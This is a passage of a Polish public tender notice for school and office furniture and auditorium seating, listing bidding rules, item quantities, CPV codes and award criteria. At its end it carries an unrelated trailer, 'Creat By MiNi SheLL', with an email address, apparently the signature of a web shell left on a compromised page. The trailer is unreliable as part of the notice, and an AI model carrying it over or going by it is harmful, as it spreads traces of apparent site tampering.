f)	charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem (np. umowa cywilno-prawna, umowa o współpracy),
g)	okres udziału innego podmiotu przy wykonywaniu zamówienia ( co najmniej na czas realizacji zamówienia).

Wzór zobowiązania do oddania do dyspozycji niezbędnych zasobów stanowi załącznik do SIWZ.

W przypadku, gdy wykonawca polega na zdolności ekonomicznej i finansowej  innych podmiotów musi dołączyć do w/w dokumentu  - dokument/ty o którym/ch mowa w SIWZ w rozdziale V 1.5) b)

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
1.	W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców ubiegających się wspólnie o udzielenie zamówienia  musi złożyć dokumenty i oświadczenie w zakresie spełniania warunku braku podstaw do wykluczenia (o ile są wymagane). Pozostałe dokumenty będą traktowane jako wspólne. 
2.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia  muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego z wykonawców ubiegających się wspólnie o udzielenie zamówienia 
3.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.
4.	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.
5.	W formularzu OFERTA w miejscu nazwa i adres wykonawcy należy wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających się o zamówienie, a nie tylko pełnomocnika.
6.	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie  żądać umowy regulującej ich współpracę.


Forma dokumentów:
1.	Dokumenty, o których mowa w rozdziale V SIWZ  muszą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę, z zastrzeżeniem, że:
1)	informacja że wykonawca nie należy do grupy kapitałowej, 
2)	lista podmiotów należących do tej samej grupy kapitałowej,
3)	oświadczenia z art. 22 ust. 1 Pzp, 
4)	zobowiązania innego podmiotu do oddania do dyspozycji niezbędnych zasobów,
5)	pełnomocnictwo,
muszą być złożone w formie oryginału lub kopii poświadczonej przez notariusza.
2.	Kopia wymaganego dokumentu (z wyłączeniem informacji że wykonawca nie należy do grupy kapitałowej, listy podmiotów należących do tej samej grupy kapitałowej, oświadczenia z art. 22 ust. 1 Pzp, zobowiązania innego podmiotu do oddania do dyspozycji niezbędnych zasobów i pełnomocnictwa ) musi być poświadczona za zgodność z oryginałem przez Wykonawcę lub uprawnionego przedstawiciela Wykonawcy - podpisującego ofertę tj. na kopii winien znaleźć się podpis wykonawcy lub umocowanego przedstawiciela Wykonawcy wraz ze stwierdzeniem za zgodność z oryginałem. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z pieczątką osoby podpisującej kopie dokumentów za zgodność z oryginałem lub czytelny podpis bez pieczątki).
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b Pzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
4.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z ich tłumaczeniem na język polski. 

Zamawiający dopuszcza składanie ofert częściowych.
Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje rozliczenia w walutach obcych.
Zamawiający nie przewiduje aukcji elektronicznej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia, o których mowa w art. 29 ust. 4 Pzp.
Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 Pzp 
Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę prac związanych z rozmieszczeniem  i instalacją.
Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy

Kryteria oceny ofert zostały przyjęte dla częsci I,II,III.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mebli do sal lekcyjnych, wypożyczalni, czytelni, świetlicy, jadalni, szatni,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - dostawa mebli do sal lekcyjnych, wypożyczalni, czytelni, świetlicy, jadalni, szatni,
Stół  2-os z regulowaną wysokością 5-6 szt. 15
 Krzesło z regulacją wysokości 5-6  szt. 30
Biurko  nauczycielskie szt. 38
Tablica szkolna tryptyk biała 3,40m szt.5
Szafka wodna Szt 5
Szafka z szerokimi półkami  Szt 1
Szafka z szerokimi  7 szufladami  Szt 2
Nadstawka z  3 pólkami   Szt 4
Nadstawka z  1 pólką   Szt 2
Szafka z 3 półkami  Szt 1
Regał oszklony na pomoce  szt. 1
Stół roboczy szt. 16
Nadstawka laboratoryjna  szt. 6
Stół demonstracyjny szt. 1
Szafka wodna z 1 zlewem Szt 2
Szafka wisząca  Szt 6
Stół laboratoryjny  Szt 2
Tablica szkolna pojedyncza 170cm biała szt. 13
Taboret Szt 31
Stół 2-os z regulowaną wysokością 5-6 Szt 81
Stół 1-os z regulowaną wysokością 5-6 Szt 88
Krzesło  z regulowaną wysokością 5-6 Szt 316
Szafa wysoka z witryną w ramie aluminiowej Szt 6
Regał wysoki z szafką szt. 22
Szafa wysoka czterodrzwiowa szt. 52
stół laboratoryjny szt 2
Stolik komputerowy 1-os.  Szt 52
Szafka średnia  Szt 7
Regał średni Szt 2
Regał ekspozycyjny Szt 32
Regał jednostronny wzmocniony - moduł podstawowy Szt 8
Regał jednostronny wzmocniony - moduł dodatkowy Szt 11
Regał dwustronny wzmocniony - moduł podstawowy Szt 16
Regał dwustronny wzmocniony - moduł dodatkowy Szt 25
Stół demonstracyjny 2-szafkowy Szt 1
Stolik uczniowski 3-osobowy  Szt 10
Szafka 6-skrytkowa szt. 60
Ławka szatniowa bez oparcia Szt 47
Stól 1-os z regulowaną wysokością 3-4 Szt 54
Krzesło  z regulowaną wysokością 3-4 Szt 502
Szafka ubraniowa z 9 schowkami   szt. 21
Szafka ubraniowa z 9 schowkami  Szt 21
Szafka ubraniowa 3-modułowa  szt. 1
Szafka ubraniowa 2-modułowa  Szt 1
szafka 6-skrytkowa szt. 54
Szafka 3-skrytkowa  Szt 6
Szafa czterodrzwiowa z wysoką półką  Szt 19
Tablica szkolna tryptyk biała 3,40m kratka-linie-gładki Szt 18
Regał wysoki  z szafką  Szt 35
Stół 2-os z regulowaną wysokością 3-4 Szt 208
Zestaw meblowy zielony Kpl 1
Zestaw meblowy żółty Kpl 1
Zestaw meblowy pomarańczowy Kpl 1
szafka 3-skrytkowa.  Obudowa kolor RAL 7047, dzrwiczki 5015 szt 40
szafka 3-skrytkowa. Obudowa kolor RAL 7047, dzrwiczki 6018 szt. 14
szafka 3-skrytkowa. Obudowa kolor RAL 7047, dzrwiczki 2008 szt 14
Stół  świetlicowy  regulowany w zakresie 3-4 szt. 15
Krzesełka o regulowanej wysokości 3-4 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej  szt. 57
Krzesełka o regulowanej wysokości 3-4 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej. szt. 57
Krzesełka regulowanej wysokości 3-4 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej. szt. 24
Zestaw meblowy 1 Kpl 1
Zestaw meblowy 2 Kpl 1
Zestaw meblowy 3 Kpl 1
Schowki szatniowe Szt 6
Stół  świetlicowy  regulowany w zakresie 3-4 szt. 6
Stoły na stelażu metalowym z nogami okrągłymi 120x80 szt. 4
Stoły na stelażu metalowym z nogami okrągłymi 160x80 szt. 4
Krzesełka o regulowanej wysokości 5-6 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej  Szt 28
Krzesełka o regulowanej wysokości 5-6 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej  Szt 28
Dostawa i montaż mebli i wyposażenia Kpl 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1, 39.11.00.00-6, 30.19.59.00-1, 39.00.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. okres gwarancji - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mebli biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - dostawa mebli biurowych, 
Krzesło obrotowe  szt.40
Lady recepcyjne - zestaw Kpl 2
Biurko w kształcie litery L  Szt 2
Kontener stacjonarny   Szt 2
Stół konferencyjny kwadratowy  Szt 1
Szafa z drzwiami przesuwnymi  Szt 4
Szafa  bez drzwi z 2 półkami Szt 2
Szafa ubraniowa  Szt 2
Szafa aktowa ze  skarbczykiem Szt 2
Gablota ekspozycyjna  Szt 1
Krzesło na płozach Szt 12
Biurko prostokątne  Szt 2
Kontener mobilny  Szt 2
Szafa z drzwiami przesuwnymi  Szt 2
Szafa ubraniowa  Szt 1
Szafa aktowa  Szt 6
Krzesło na podstawie jezdnej  Szt 3
Biurko prostokątne Szt  2
Kontener mobilny Szt 2
Panel recepcyjny środkowy Szt 2
Panel recepcyjny boczny  Szt 1
Blat do panela  Szt 2
Dostawka prostokątna Szt 1
Stolik do krótkich spotkań  Szt 1
Krzesło konferencyjne   szt. 40
Stól konferencyjny  szt. 9
Szafa ubraniowa  Szt 2
Szafa wysoka z 10 schowkami  Szt 4
Dostawa i montaż mebli i wyposażenia Kpl 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.00.00-6, 39.00.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. okres gwarancji - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa foteli audytoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - dostawa foteli audytoryjnych.
Dostawa 238 szt. foteli audytoryjnych do sali audytoryjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.00.00-6, 39.11.31.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. okres gwarancji - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com